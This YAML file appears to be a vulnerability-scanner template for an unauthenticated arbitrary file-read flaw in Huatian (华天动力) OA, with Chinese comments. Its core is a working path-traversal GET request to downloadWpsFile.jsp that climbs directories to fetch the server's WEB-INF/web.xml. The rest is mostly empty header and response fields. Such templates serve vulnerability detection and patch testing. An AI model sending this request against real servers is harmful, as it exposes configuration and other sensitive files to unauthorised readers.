33 lines
1.2 KiB
YAML
33 lines
1.2 KiB
YAML
|
keyword: 华天OA
|
|||
|
|
name: 华天OA任意文件读取漏洞
|
|||
|
|
description: |
|
|||
|
|
华天动力OA是一款将先进的管理思想、管理模式和软件技术、网络技术相结台,为用户提供了低成本、高效能的协同办公和管理平台;华天动力OA downoadWposFile,jsp 接口处存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。
|
|||
|
|
requests: # 为空代表默认或者不启用
|
|||
|
|
path: "/OAapp/jsp/downloadWpsFile.jsp?fileName=../../../../../../htoa/Tomcat/webapps/ROOT/WEB-INF/web.xml"
|
|||
|
|
method: GET
|
|||
|
|
headers:
|
|||
|
|
User-agent:
|
|||
|
|
Content-length:
|
|||
|
|
Accept:
|
|||
|
|
Content-type:
|
|||
|
|
Accept-Encoding:
|
|||
|
|
Cookie:
|
|||
|
|
Referer:
|
|||
|
|
X-Forwarded-For:
|
|||
|
|
body-raw: |-
|
|||
|
|
# 如果需要发送请求体,在这里填写
|
|||
|
|
|
|||
|
|
response:
|
|||
|
|
path: "" # 不填则默认接收此请求的响应包
|
|||
|
|
status-code: 200
|
|||
|
|
body: "" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
|
|||
|
|
time: # 此处填写响应包响应时间,默认不启用
|
|||
|
|
headers:
|
|||
|
|
Server:
|
|||
|
|
Content-type:
|
|||
|
|
Content-length:
|
|||
|
|
Date:
|
|||
|
|
Connection:
|
|||
|
|
impact: |
|
|||
|
|
造成网站文件以及服务器内文件泄露。
|